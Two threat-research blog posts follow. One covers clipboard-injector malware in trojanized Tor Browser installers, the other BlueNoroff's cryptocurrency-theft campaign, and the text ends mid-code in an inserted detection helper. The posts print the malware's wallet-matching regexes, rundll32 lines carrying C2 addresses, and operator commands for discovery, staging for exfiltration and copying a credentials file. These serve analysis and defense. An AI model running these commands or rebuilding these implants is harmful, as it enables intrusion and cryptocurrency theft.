Vitaly Kamluk – Securelist (https://securelist.com)

Copy-paste heist or clipboard-injector attacks on cryptousers
https://securelist.com/copy-paste-heist-clipboard-injector-targeting-cryptowallets/109186/
Tue, 28 Mar 2023 10:00:08 +0000

It is often the case that something new is just a reincarnation of something old. We have come across a series of clipboard injection attacks on cryptocurrency users, which emerged starting from September 2022. Although we have written about a similar malware attack in 2017 in one of our blogposts, the technique is still very relevant today as it doesn’t have any perfect solution from the perspective of operating system design. The only way to prevent such attacks is to be extremely cautious and attentive, or use a decent anti-malware solution to detect a piece of malicious code. As long as such attacks continue to thrive in the modern ecosystem of the cryptocurrency world, it’s worth explaining how they work and where the danger lies.

In a nutshell, the attack relies on malware replacing part of the clipboard contents once it detects a wallet address in it.

Past attacks

This technique of replacing clipboard contents is more than a decade old. It all started with banking trojans focused on specific banks that replaced bank account numbers in the clipboard. Here is a report from CERT Polska that warned Polish users about such a threat targeting customers of local banks in 2013. However, such attacks required detecting a particular internet banking environment, and their success also depended on other fields being filled in correctly (i.e. bank SWIFT code, branch name, etc.). Focusing on something global and provider-independent, such as a cryptocurrency wallet, made it much more efficient for cryptothieves. Add to this the increased value of cryptocurrencies, and it became a very lucrative target. So, this is where we started seeing the first clipboard attacks on cryptocurrency owners. They were replicated and reused in other malware too. We even made a generic detection for some of these families, naming them Generic.ClipBanker.

Why it is dangerous

Despite the attack being fundamentally simple, it harbors more danger than it would seem. And not only because it creates irreversible money transfers, but because it is so passive and hard for a normal user to detect. Just think of it: most malware is only effective when there is a communication channel established between the malware operator and the victim’s system. Backdoors require a control channel, spying trojans require a way to pass stolen data, cryptominers need network communication too, etc. Only a small fraction of malware exists on its own and does not require any communication channel. But this is the most dangerous and harmful kind: self-replicating malware, such as destructive viruses and network worms; ransomware that silently encrypts local files, and so on. While worms and viruses may not connect to the attacker’s control servers, they generate visible network activity, or increase CPU or RAM consumption. So does encrypting ransomware. Clipboard injectors, on the contrary, can be silent for years, show no network activity or any other signs of presence until the disastrous day when they replace a cryptowallet address.

Another factor is detection of the malware payload. While most malware is discovered through an association with known bad infrastructure (IPs, domains, URLs), or when it automatically activates a malicious payload, clipboard injectors do not run their evil payload unless an external condition (the clipboard contains data of certain format) is met. This further lowers the chances of new malware being discovered through automatic sandboxing.

Trojanized Tor Browser installers

Some recent developments in the use of this type of malware seek to abuse Tor Browser, a tool to access the dark web using the Onion protocol, also known as the Tor network. We relate this to the ban of Tor Project’s website in Russia at the end of 2021, which was reported by the Tor Project itself. According to the latter, Russia was the second largest country by number of Tor users in 2021 (with over 300,000 daily users, or 15% of all Tor users). The Tor Project called to help keep Russian users connected to Tor to circumvent censorship. Malware authors heard the call and responded by creating trojanized Tor Browser bundles and distributing them among Russian-speaking users. The first variants appeared in December 2021, but only since August 2022 have we seen a larger wave of torbrowser_ru.exe malicious executables. The trojanized installers offered Tor Browser with a regional language pack, including Russian, as the file name suggests:

Supported languages in the trojanized installer

We have come across hundreds of similar installers that all behaved according to the following scenario:

Trojanized Tor Browser extracting and launching a malware payload

The target user downloads Tor Browser from a third-party resource and starts it as torbrowser.exe. The installer is missing a digital signature and is just a RAR SFX (self-extracting executable) archive. It contains three files:

  • The original torbrowser.exe installer with a valid digital signature from the Tor Project.
  • A command-line RAR extraction tool with a randomized name.
  • A password-protected RAR archive (random password).

The SFX starts the original torbrowser.exe as a disguise, while also running the RAR extraction tool on the embedded password-protected RAR archive. The purpose of protecting it with a password is to evade static-signature detection by antivirus solutions; it doesn’t protect the malware from sandbox-based detection. The password and the destination for the extraction are part of the trojanized torbrowser.exe executable, and may be extracted via manual analysis. Once the file is dropped inside one of the current user’s AppData subdirectories, the dropped executable is started as a new process and registers itself in the system autostart. Most of the time, the executable is disguised with the icon of a popular application, such as uTorrent.
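Two of the facts above (no digital signature, RAR SFX) can be checked offline on a sample before it is ever run. The Python helper below is an added example written for this edit, not code from the original post or from Kaspersky: it reads the PE header's Attribute Certificate Table entry to see whether an Authenticode blob is embedded at all, and looks for a RAR archive appended after the executable stub. The PE offsets follow the PE/COFF specification; `build_stub` is a constructed, non-runnable header used only so that the example runs without a real sample.

```python
import struct

# Signatures of RAR archives appended to an SFX stub (RAR 4.x and RAR 5.x).
RAR4_MAGIC = b"Rar!\x1a\x07\x00"
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"
IMAGE_DIRECTORY_ENTRY_SECURITY = 4  # Attribute Certificate Table (Authenticode)


def authenticode_entry(data: bytes):
    """Return (offset, size) of the embedded Authenticode blob, or None if the PE
    has no certificate table. Presence only means a signature is embedded; it does
    NOT mean the signature is valid or trusted (use signtool or PowerShell's
    Get-AuthenticodeSignature for that)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        return None
    opt_off = pe_off + 4 + 20                      # PE signature + 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt_off)[0]
    if magic == 0x10B:                             # PE32: data directories start at +96
        dir_base = opt_off + 96
    elif magic == 0x20B:                           # PE32+: data directories start at +112
        dir_base = opt_off + 112
    else:
        return None
    entry = dir_base + IMAGE_DIRECTORY_ENTRY_SECURITY * 8
    if len(data) < entry + 8:
        return None
    offset, size = struct.unpack_from("<II", data, entry)
    if offset == 0 or size == 0:
        return None
    return offset, size


def embedded_rar_offset(data: bytes) -> int:
    """Offset of a RAR archive appended after the executable stub, or -1."""
    for magic in (RAR5_MAGIC, RAR4_MAGIC):
        pos = data.find(magic)
        if pos > 0:            # > 0: the archive follows a stub, it is not a bare .rar
            return pos
    return -1


def triage(data: bytes) -> dict:
    """The two facts the write-up calls out for the rogue installer."""
    return {
        "has_signature": authenticode_entry(data) is not None,
        "rar_sfx": embedded_rar_offset(data) > 0,
    }


def build_stub(pe32plus: bool = True, cert_size: int = 0, payload: bytes = b"") -> bytes:
    """Constructed minimal PE header (not runnable code) for offline testing only."""
    pe_off = 0x40
    hdr = bytearray(b"MZ" + b"\0" * (0x3C - 2)) + struct.pack("<I", pe_off)
    opt_size = 240 if pe32plus else 224
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C,
                                   0, 0, 0, 0, opt_size, 0)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    if cert_size:
        cert_offset = len(hdr) + len(opt) + len(payload)
        struct.pack_into("<II", opt,
                         (112 if pe32plus else 96) + IMAGE_DIRECTORY_ENTRY_SECURITY * 8,
                         cert_offset, cert_size)
    return bytes(hdr + opt + payload + b"\0" * cert_size)


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            print(path, triage(f.read()))
```

Plenty of legitimate installers are also RAR SFX archives, so the pair "unsigned and SFX" is a triage signal that earns the sample a closer look, not a verdict; the official Tor Browser installer carries a signature, which is the difference the post points out.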

Clipboard-injector malware

The payload of this installer is passive and communicationless clipboard-injector malware.

The malware is protected with the Enigma packer v4.0, which complicates analysis. Enigma is a commercial software protector. The malware authors likely used a cracked version of the packer lacking any license information. However, if this or another instance from the same malware authors appears in the hands of law enforcement officers, we would like to leave a reference to their system drive serial number, which we extracted from the malware sample: 9061E43A.

The payload of this malware is rather simple: the malware integrates into the chain of Windows clipboard viewers and receives a notification every time the clipboard data is changed. If the clipboard contains text, it scans the contents with a set of embedded regular expressions. Should it find a match, it is replaced with one randomly chosen address from a hardcoded list.

Hexdump of the malware data with regular expressions and replacement wallet IDs

We identified the following regular expressions inside the sample.
bc1[a-zA-HJ-NP-Z0-9]{35,99}($|\s) – Bitcoin
(^|\s)[3]{1}[a-km-zA-HJ-NP-Z1-9]{25,34}($|\s) – Litecoin/Bitcoin Legacy
(^|\s)D[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}($|\s) – Dogecoin
(^|\s)0x[A-Fa-f0-9]{40}($|\s) – ERC-20 (i.e. Ethereum, Tether, Ripple, etc)
(^|\s)[LM]{1}[a-km-zA-HJ-NP-Z1-9]{25,34}($|\s) – Litecoin Legacy
((^|\s)ltc1[a-zA-HJ-NP-Z0-9]{35,99}($|\s) – Litecoin
(^|\s)8[0-9A-B]{1}[1-9A-HJ-NP-Za-km-z]{93,117}($|\s) – Monero
(^|\s)4[0-9A-B]{1}[1-9A-HJ-NP-Za-km-z]{93,117}($|\s) – Monero
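To see what these patterns do and do not match, here is a Python port of them, added for this edit rather than taken from the post or the sample (the extra opening parenthesis in the ltc1 pattern as printed on the page is assumed to be a typo and is balanced here). It scans text the way the injector does, whitespace-delimited tokens with the first matching pattern winning, and shows why the Notepad canary from the Countermeasures section triggers the Bitcoin pattern while being no valid address.

```python
import re

# Port of the regular expressions listed in the write-up. The order is the page's
# order; the first pattern that matches a token wins, mirroring "should it find a
# match, it is replaced".
WALLET_PATTERNS = [
    ("Bitcoin",                 r"bc1[a-zA-HJ-NP-Z0-9]{35,99}($|\s)"),
    ("Litecoin/Bitcoin Legacy", r"(^|\s)[3]{1}[a-km-zA-HJ-NP-Z1-9]{25,34}($|\s)"),
    ("Dogecoin",                r"(^|\s)D[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}($|\s)"),
    ("ERC-20",                  r"(^|\s)0x[A-Fa-f0-9]{40}($|\s)"),
    ("Litecoin Legacy",         r"(^|\s)[LM]{1}[a-km-zA-HJ-NP-Z1-9]{25,34}($|\s)"),
    ("Litecoin",                r"(^|\s)ltc1[a-zA-HJ-NP-Z0-9]{35,99}($|\s)"),   # "((" on the page balanced
    ("Monero",                  r"(^|\s)8[0-9A-B]{1}[1-9A-HJ-NP-Za-km-z]{93,117}($|\s)"),
    ("Monero",                  r"(^|\s)4[0-9A-B]{1}[1-9A-HJ-NP-Za-km-z]{93,117}($|\s)"),
]
_COMPILED = [(name, re.compile(pattern)) for name, pattern in WALLET_PATTERNS]

# The fake address the write-up suggests for the Notepad self-check.
CANARY = "bc1heymalwarehowaboutyoureplacethisaddress"


def classify_token(token: str):
    """Name of the first pattern matching one whitespace-free token, or None.
    re.search is used deliberately: the Bitcoin pattern has no leading (^|\\s)
    anchor on the page, so it also matches in the middle of a longer token."""
    for name, regex in _COMPILED:
        if regex.search(token):
            return name
    return None


def find_wallet_addresses(text: str):
    """Scan clipboard-like text the way the injector does. Every pattern is bounded
    by whitespace or string ends, so splitting on whitespace and testing each token
    is equivalent to running the patterns over the whole buffer."""
    hits = []
    for token in text.split():
        kind = classify_token(token)
        if kind is not None:
            hits.append((kind, token))
    return hits


def would_trigger_replacement(text: str) -> bool:
    """True if the injector's scan would find something to replace in this text."""
    return bool(find_wallet_addresses(text))


if __name__ == "__main__":
    # Constructed sample clipboard contents (not real wallets).
    sample = "pay 0x" + "ab" * 20 + " or " + CANARY + " before friday"
    for kind, token in find_wallet_addresses(sample):
        print(f"{kind:24s} {token}")
    print("canary matches:", classify_token(CANARY))
```

Two things the patterns imply as written: the Bitcoin bc1 pattern carries no leading anchor, so it also fires inside a longer token, and none of the listed patterns match a legacy Bitcoin address starting with 1, only those starting with 3. A port like this is also a quick way to tune a clipboard-monitoring or DLP rule without handling the sample itself.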

Each sample contains thousands of possible replacement addresses for Bitcoin. Including thousands of addresses makes it harder to denylist them or to trace the theft. However, we collected all of them and would like to share them with researchers and investigators in an attachment to this blog.

The malware authors also preserved a feature to disable their creation: a special hotkey combination (Ctrl+Alt+F10). Pressing it causes the malware to unregister all handlers and stop running. The purpose was likely to disable the malware during the testing stage.

Victimology

Among the roughly 16,000 detections, the majority were registered in Russia and Eastern Europe. However, the threat spread to at least 52 countries worldwide. Here are the TOP 10 countries affected, according to our own data:

  • Russia
  • Ukraine
  • United States
  • Germany
  • Uzbekistan
  • Belarus
  • China
  • Netherlands
  • United Kingdom
  • France

Detections of the malicious Tor Browser worldwide, January 2022 – February 2023

Given that we only see a fraction of the real picture, the global number of infections may well be several or even tens of times higher.

Impact

To measure the impact, we collected hundreds of known malware samples, unpacked them from Enigma, and extracted the cryptowallet replacement addresses. Then we walked through the respective blockchains and calculated the total inputs to the wallets, assuming they all came from compromised users. This is how we measured the total loss caused by this single malware developer.

Stolen cryptocurrencies (converted to USD at the exchange rate valid at the time of writing)

Due to its advanced technology that anonymizes transaction data to achieve maximum privacy, the Monero public ledger doesn’t reveal the transferred amount, so we couldn’t really look into it, but it is likely to be very small compared to the Bitcoin theft.

We believe that the actual theft is bigger because this research is focused on Tor Browser abuse. There may be other campaigns, abusing different software and using other means of malware delivery as well as other types of wallets.

Countermeasures

A mistake likely made by all victims of this malware was to download and run Tor Browser from a third-party resource. We haven’t managed to identify a single website that hosts the installer, so it is likely distributed either via torrent downloads or some other software downloader. The installers coming from the official Tor Project were digitally signed and didn’t contain any signs of such malware. So, to stay safe, in the first place, download software only from reliable and trusted sources.

However, even if you do download a rogue file masked as something else, using a decent antivirus solution or uploading the file to VirusTotal could help identify any malicious intent. Despite all attempts to evade detection, the malware will get discovered, it’s only a matter of time.

Lastly, if you would like to check if your system is compromised with malware from the same class, here is a quick Notepad trick. Type or copy the following “Bitcoin address” in Notepad: bc1heymalwarehowaboutyoureplacethisaddress

Now press Ctrl+C and Ctrl+V. If the address changes to something else, the system is likely compromised by clipboard-injector malware and is dangerous to use. At this stage we recommend scanning your system with security software for any malware presence. But if you want full confidence that no hidden backdoors remain: once a system is compromised, it should not be trusted until rebuilt.

Bitcoin address replaced by malware after pasting in an infected system

Stay safe and don’t let your coins fall into the hands of criminals.

Appendix (indicators of compromise)

Examples of clipboard injectors:

0251fd9c0cd98eb9d35768bb82b57590
036b054c9b4f4ab33da63865d69426ff
037c5bacac12ac4fec07652e25cd5f07
0533fc0c282dd534eb8e32c3ef07fba4
05cedc35de2c003f2b76fe38fa62faa5
0a14b25bff0758cdf7472ac3ac7e21a3
0b2ca1c5439fcac80cb7dd70895f41a6
0c4144a9403419f7b04f20be0a53d558
0d09d13cd019cbebf0d8bfff22bf6185
0d571a2c4ae69672a9692275e325b943

Examples of Tor Browser installers:

a7961c947cf360bbca2517ea4c80ee11
0be06631151bbe6528e4e2ad21452a17
a2b8c62fe1b2191485439dd2c2d9a7b5
53d35403fa4aa184d77a4e5d6f1eb060
ad9460e0a58f0c5638a23bb2a78d5ad7
cbb6f4a740078213abc45c27a2ab9d1c
eaf40e175c15c9c9ab3e170859bdef64
89c86c391bf3275790b465232c37ddf5
1ce04300e880fd12260be4d10705c34f
c137495da5456ec0689bbbcca1f9855e

Replacement addresses for Bitcoin wallets:
Download address list (PDF)

The BlueNoroff cryptocurrency hunt is still on
https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/
Thu, 13 Jan 2022 09:00:23 +0000

BlueNoroff is the name of an APT group coined by Kaspersky researchers while investigating the notorious attack on Bangladesh’s Central Bank back in 2016. A mysterious group with links to Lazarus and an unusual financial motivation for an APT. The group seems to work more like a unit within a larger formation of Lazarus attackers, with the ability to tap into its vast resources: be it malware implants, exploits, or infrastructure. See our earlier publication about BlueNoroff attacks on the banking sector.

Also, we have previously reported on cryptocurrency-focused BlueNoroff attacks. It appears that BlueNoroff shifted focus from hitting banks and SWIFT-connected servers to solely cryptocurrency businesses as the main source of the group’s illegal income. These attackers even took the long route of building fake cryptocurrency software development companies in order to trick their victims into installing legitimate-looking applications that eventually receive backdoored updates. We reported about the first variant of such software back in 2018, but there were many other samples to be found, which was later reported by the US CISA (Cybersecurity and Infrastructure Security Agency) in 2021.

The group is currently active (recent activity was spotted in November 2021).

The latest BlueNoroff’s infection vector

If there’s one thing BlueNoroff has been very good at, it’s the abuse of trust. Be it an internal bank server communicating with SWIFT infrastructure to issue fraudulent transactions, cryptocurrency exchange software installing an update with a backdoor to compromise its own user, or other means. Throughout its SnatchCrypto campaign, BlueNoroff abused trust in business communications: both internal chats between colleagues and interaction with external entities.

According to our research this year, we have seen BlueNoroff operators stalking and studying successful cryptocurrency startups. The goal of the infiltration team is to build a map of interactions between individuals and understand possible topics of interest. This lets them mount high-quality social engineering attacks that look like totally normal interactions. A document sent from one colleague to another on a topic, which is currently being discussed, is unlikely to trigger any suspicion. BlueNoroff compromises companies through precise identification of the necessary people and the topics they are discussing at a given time.

In a simple scenario, it can appear as a notification of a shared document via Google Drive from one colleague/friend to another:

Note the tiny “X” image – it’s an icon for an image that failed to load. We opened the email on an offline system; if the system had been connected to the internet, there would be a real icon for a Google document loaded from a third-party tracking server that immediately notifies the attacker that the target opened the email.

But we also observed a slightly more elaborate approach of an email being forwarded from one colleague to another. This works even better for the attacker, because the original email and the attachment appear to have already been checked by the forwarding party. Ultimately, it elevates the level of trust sufficiently for the document to be opened.

We haven’t shown the forwarder address as it belongs to an attacked user, but note there is a piece of text that reads “via sendgrid.net”. There is no website at sendgrid.net, but it may be a domain owned by a US-based company called Sendgrid, which specializes in email distribution and email marketing campaigns. According to its website, it offers rich user-tracking capabilities and claims to be sending 90 billion emails every month. It seems to be a legitimate and reputable business, which is probably why Gmail accepts MIME header customization (or sender address forgery in the case of an attack) with nothing more than the short remark “via sendgrid.net”. We informed Sendgrid of this activity. Of course, many users could easily overlook the remark or simply not know what it means. The person whose name was abused here seems to be in the top management of the Digital Currency Group (dcg.co), according to public information. To make it clear, we believe that the employee of the company, or the company itself, has nothing to do with this attack or the email.

Which other company names have they abused? There are many. We have compiled a list of names and logos so you can watch out for them in your inbox.

The companies whose logos are displayed here were chosen by BlueNoroff for impersonation in social engineering tricks. Note, this is no proof that the companies listed were compromised.

If you recognize them in incoming communication, there’s no reason to panic, but proceed with caution. For example, you can open incoming documents in a sandboxed or virtualized offline environment, convert the document to a different format, or use a non-standard viewer (e.g., a server-side document viewer such as Google Docs, Collabora Online, ONLYOFFICE, Microsoft Office Online, etc.).

In some cases, we saw what looked like the compromise of an existing registered company and the subsequent use of its resources such as social media accounts, messengers and email to initiate business interaction with the target. If a venture capital company approaches a startup and sends files that look like an investment contract or some other promising documents, the startup won’t hesitate to open them, even if some risk is involved and Microsoft Office adds warning messages.

A compromised LinkedIn account of an actual company representative was used to approach a target and engage with them. The true company’s website is different from the one referenced in the conversation. By manipulating trust in this way, BlueNoroff doesn’t even need to burn valuable 0-days. Instead, they can rely on regular macro-enabled documents or older exploits.

We found they generally stick to CVE-2017-0199, using it again and again before trying something else. The vulnerability initially allowed automatic execution of a remote script linked to a weaponized document. The exploit relies on fetching remote content via an embedded URL inside one of the document meta files. An attentive user may even spot something fishy is happening while MS Word shows a standard loading popup window.

If the document was opened offline or the remote content was blocked, it presents some legitimate content, likely scraped or stolen from another party.

If the document isn’t blocked from connecting to the internet, it fetches a remote template that is another macro-enabled document. The two documents are like two ingredients of an explosive that produce a blast when mixed together. The first one contains two base64-encoded binary objects (one for 32-bit and one for 64-bit Windows) declared as image data. The second document (the remote template) contains a VBA macro that extracts one of these objects and spawns a new process (notepad.exe) into which the binary code is injected and executed. Although the binary objects have JPEG headers, they are actually just PE files with modified headers.

Interestingly, BlueNoroff shows improved opsec at this stage. The VBA macro does a cleanup by removing the binary objects and the reference to the remote template from the original document and saving it to the same file. This essentially de-weaponizes the document leaving investigators scratching their head during analysis.

Additionally, we’ve seen that this actor utilized an elevation of privilege (EoP) technique in the initial infection stage. According to our telemetry, the word.exe process, created by opening the malicious document, spawned the legitimate process, dccw.exe. The dccw.exe process is a Windows system file that has auto-elevate permission. Abusing a dccw.exe file is a known technique and we suspect the malware authors used it to run the next stage malware with high privilege. In another case, we have observed word.exe spawning a notepad.exe that received a malware injection and in turn spawning mmc.exe. Unfortunately, the full details of this technique are unavailable due to some missing parts.

Malware infection

We assess that the BlueNoroff group’s interest in cryptocurrency theft started with the SnatchCrypto campaign that has been running since at least 2017. While tracking this campaign, we’ve seen several full-infection chains deliver malware. For the initial infection vector, they usually utilized zipped Windows shortcut files or weaponized Word documents. Note that this group has various methods in their infection arsenal and assembles the infection chain to suit the situation.

Infection chain #1. Windows shortcut

The group has been utilizing this infection vector for a long time. The actor sent an archive-type file containing a shortcut file and document to the victim. All archives used for the initial infection vector had a similar structure. The archive contained a document file such as Word, Excel or PDF file that was password protected alongside another file disguised as a text file containing the document’s password. This file is in fact a Windows shortcut file used to fetch the next stage payload.

Archive file and its contents

Before implanting a Windows executable type backdoor, the malware delivered a Visual Basic Script and Powershell Script through multiple stages.

Infection chain

The fetched VBS file is responsible for fingerprinting the victim by sending basic system information, network adapter information, and a process list. Next, the Powershell agent is delivered in encoded format. It also sends the victim’s general information to the C2 server and then retrieves the next Powershell agent, which is capable of executing commands from the malware operator.

VBS and Powershell delivery chain

Using this Powershell agent a full-featured backdoor is created, executing with the command line parameter:

rundll32.exe %Public%\wmc.dll,#1 4ZK0gYlgqN6ZbKd/NNBWTJOINDc+jJHOFH/9poQ+or9l

The malware checks the command line parameter, decoding it with base64 and decrypting it with an embedded key. The decrypted data contains:

  • 63429981 63407466 45.238.25[.]2 443

To verify the parameter’s legitimacy, the malware XORs the second parameter with the hex value 0x5837 and compares the result with the first parameter. If both values match, the malware returns the decrypted C2 address and port. The malware also loads a configuration file (%Public%\Videos\OfficeIntegrator.dat in this case), decrypting it using RC4. This configuration file contains C2 addresses and the path from which the next-stage payload will be loaded. The malware has rich backdoor functionality for controlling infected machines:

  • Directory/File manipulation
  • Process manipulation
  • Registry manipulation
  • Executing commands
  • Updating configuration
  • Stealing stored data from Chrome, Putty, and WinSCP

These are used to deploy other malware tools to monitor the victim: a keylogger and screenshot taker.

Infection chain #2. Weaponized Word document

Another infection chain we’ve seen started from a malicious Word document. This is where the actor utilized remote template injection (CVE-2017-0199) with an embedded malicious Visual Basic Script. In one file (MD5: e26725f34ebcc7fa9976dd07bfbbfba3) the remotely fetched template refers to the first-stage document and reads the encoded payload from it, injecting it into the legitimate process.

Remote template infection chain

The other case embedded a malicious Visual Basic Script and extracted a Powershell agent on the victim’s system. Going through this initial infection procedure results in a Windows executable payload being installed.

Infection chain

Persistence backdoor #1 is dropped under the Start menu path as its persistence mechanism, and its first export function is invoked with the C2 address as the argument:

rundll32.exe "%appdata%\microsoft\windows\start menu\programs\maintenance\default.rdp",#1 https://sharedocs[.]xyz/jyrhl4jowfp/eyi8t5sjli/qzrk8blr_q/rnyyuekwun/yzm1ncj8yb/a3q==

Upon execution, the malware generates a unique installation ID based on the combined hostname, username and current timestamp, which are concatenated and hashed using a simple string hashing algorithm. After sending a beacon to the C2 server, the malware collects general system information, sending it after AES encryption. The data received from the server is expected to have the following structure:

@ PROCESS_ID # DLL_FILE_SIZE : DLL_FILE_DATA

The PROCESS_ID indicates the target process into which the malware will inject a new DLL. DLL_FILE_SIZE is the size of the DLL file to inject. And lastly, DLL_FILE_DATA contains the actual binary executable file to inject.
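Both formats described in this chain, the decrypted command-line parameter with its XOR check (Infection chain #1) and the C2 response frame above, are easy to get wrong in a triage script. The following parser for both is an added example written for this edit, not code from the post or from the malware. It assumes the parameter has already been base64-decoded and decrypted (the embedded key and cipher are not given on the page), and it does not assume whether the spaces around @, # and : in the frame layout are literal; the parameter sample is the page's own decrypted value, the frame is constructed.

```python
XOR_KEY = 0x5837  # the constant named in the write-up


def verify_decrypted_parameter(decrypted: str):
    """Apply the check the write-up describes to the decrypted parameter string
    "<check> <value> <host> <port>": value XOR 0x5837 must equal check. Returns
    (c2_host, c2_port) on success, None otherwise. Decryption of the base64
    parameter itself is out of scope (key and cipher are not on the page)."""
    fields = decrypted.split()
    if len(fields) != 4:
        return None
    check, value, host, port = fields
    if not (check.isdigit() and value.isdigit() and port.isdigit()):
        return None
    if (int(value) ^ XOR_KEY) != int(check):
        return None               # tampered or mis-decrypted parameter
    return host, int(port)


def parse_c2_response(blob: bytes):
    """Parse the '@ PROCESS_ID # DLL_FILE_SIZE : DLL_FILE_DATA' frame. Whitespace
    around the separators is tolerated either way. Returns (pid, dll_bytes) only
    when the declared size matches the data actually present."""
    if not blob.startswith(b"@"):
        return None
    hash_pos = blob.find(b"#", 1)
    if hash_pos < 0:
        return None
    colon_pos = blob.find(b":", hash_pos + 1)
    if colon_pos < 0:
        return None
    try:
        pid = int(blob[1:hash_pos].strip())
        size = int(blob[hash_pos + 1:colon_pos].strip())
    except ValueError:
        return None
    data = blob[colon_pos + 1:]
    if len(data) == size + 1 and data[:1] == b" ":
        data = data[1:]           # layout with a literal space after ':'
    if len(data) != size:
        return None               # truncated or padded frame
    return pid, data


if __name__ == "__main__":
    # The page's decrypted parameter, and a constructed (not real) DLL frame.
    print(verify_decrypted_parameter("63429981 63407466 45.238.25[.]2 443"))
    print(parse_c2_response(b"@4321#4:MZ\x90\x00"))
```

The size check matters for analysis tooling as much as for the malware: a frame that claims one size and carries another is either corrupted capture data or an attempt to confuse the parser, and either way should not be written to disk as a "recovered DLL".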

Based on our telemetry, the actor used another type of backdoor. The persistence backdoor #2 is used to silently run an additional executable payload that is received over an encrypted channel from a remote server. The server address is not hardcoded but rather stored in an encrypted file on the disk (%WINDIR%\AppPatch\PublisherPolicy.tms), whose path is hardcoded in the backdoor. The decrypted configuration file has an identical structure to the configuration file used in Infection chain #1.

As we can see from the above case, the actor behind this campaign delivered the final payload through a multi-stage infection and carefully delivered the next payload only after checking the fingerprint of the victim. This makes it harder to collect indicators to respond to the attack. With a strict infection chain, a full-featured Windows executable type backdoor is installed. This custom backdoor has long been attributed only to the BlueNoroff group, so we strongly believe that the BlueNoroff group is behind this campaign.

Assets theft

Collecting credentials

One of the strategies this threat actor usually uses after implanting a full-featured backdoor is the common discovery and collection strategy used by APT threat actors. We managed to identify BlueNoroff’s hands-on activities on one victim and observed that the group delivered the final payload very selectively. The malware operator mostly relied on Windows commands when performing initial profiling. They collected user accounts, IP addresses and session information:

  • cmd.exe /c “query session >%temp%\TMPBFF2.tmp 2>&1”
  • cmd.exe /c “ipconfig /all >%temp%\TMPEEE2.tmp 2>&1”
  • cmd.exe /c “whoami >%temp%\TMP218C.tmp 2>&1”
  • cmd.exe /c “net user [user account] /domain >%temp%\TMP4B7C.tmp 2>&1”
  • cmd.exe /c “net localgroup administrators >%temp%\TMP9518.tmp 2>&1”
  • cmd.exe /c “query session >%temp%\TMPBFF2.tmp 2>&1”
  • cmd.exe /c “ipconfig /all >%temp%\TMPEEE2.tmp 2>&1”

In the collection phase, the malware operator also relied on Windows commands. After finding folders of interest, they copied a folder named 策略档案 (Chinese for “Policy file”) to the previously created “MM” folder for exfiltration. They also collected a configuration file related to cryptocurrency software in order to extract possible credentials or other account details.

  • cmd.exe /c “mkdir %public%\MM >%temp%\TMPF522.tmp 2>&1”
  • xcopy “%user%\Desktop\[redacted]工作文档\MM策略档案” %public%\MM /S /E /Q /Y
  • cmd.exe /c “rd /s /q %public%\MM >%temp%\TMP729D.tmp 2>&1”
  • cmd.exe /c “type D:\2\Crypt[redacted]\Crypt[redacted].conf >%temp%\TMP496B.tmp 2>&1”

From one victim, we discovered that the operators manually copied a file that was created by one of the monitoring utilities (such as screenshot or keystroke data) to the %TEMP% folder in order to be sent to an attacker-controlled remote resource.

  • cmd.exe /c “copy “%appdata%\Microsoft\Feeds\Creds_5FADD329.dat” %public%\ >%temp%\TMP11C4.tmp 2>&1”
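The commands listed above share a shape that is easy to hunt for in process-creation telemetry: cmd.exe /c with output redirected to a %temp%\TMPxxxx.tmp file followed by 2>&1, classic discovery commands, and staging under %public%. The Python below is an added example for this edit, not code from the post: it runs such a rule over a few constructed command lines (modelled on the ones listed here, with the redacted parts replaced by placeholders) and raises a per-host alert when a temp-file redirect is seen together with several distinct discovery commands.

```python
import re

# Every operator command on the page redirects to %temp%\TMP<4 hex>.tmp 2>&1.
TEMP_REDIRECT = re.compile(r">\s*%temp%\\TMP[0-9A-F]{4}\.tmp\s+2>&1", re.I)
DISCOVERY = [
    ("query session",                 re.compile(r"\bquery\s+session\b", re.I)),
    ("ipconfig /all",                 re.compile(r"\bipconfig\s+/all\b", re.I)),
    ("whoami",                        re.compile(r"\bwhoami\b", re.I)),
    ("net user /domain",              re.compile(r"\bnet\s+user\b.*/domain\b", re.I)),
    ("net localgroup administrators", re.compile(r"\bnet\s+localgroup\s+administrators\b", re.I)),
]
# Copying or creating folders under %public% as seen in the collection phase.
STAGING = re.compile(r"\b(xcopy|copy|mkdir)\b.*%public%\\", re.I)


def analyze_command_line(cmd: str):
    """Tags describing why a single command line is interesting (empty if benign)."""
    reasons = []
    if TEMP_REDIRECT.search(cmd):
        reasons.append("redirect:temp")
    for name, regex in DISCOVERY:
        if regex.search(cmd):
            reasons.append("discovery:" + name)
    if STAGING.search(cmd):
        reasons.append("staging:public")
    return reasons


def triage_hosts(events, min_discovery: int = 3):
    """events: iterable of (host, command_line). A host alerts when the temp-file
    redirect pattern appears together with at least min_discovery distinct
    discovery commands; a lone 'whoami' from an admin does not."""
    per_host = {}
    for host, cmd in events:
        per_host.setdefault(host, []).extend(analyze_command_line(cmd))
    verdicts = {}
    for host, reasons in per_host.items():
        discovery = sorted({r for r in reasons if r.startswith("discovery:")})
        redirect = "redirect:temp" in reasons
        verdicts[host] = {
            "alert": redirect and len(discovery) >= min_discovery,
            "discovery": discovery,
            "temp_redirect": redirect,
            "staging": "staging:public" in reasons,
        }
    return verdicts


# Constructed sample events (host, CommandLine), modelled on the page's list.
SAMPLE_EVENTS = [
    ("WS01", r'cmd.exe /c "query session >%temp%\TMPBFF2.tmp 2>&1"'),
    ("WS01", r'cmd.exe /c "ipconfig /all >%temp%\TMPEEE2.tmp 2>&1"'),
    ("WS01", r'cmd.exe /c "whoami >%temp%\TMP218C.tmp 2>&1"'),
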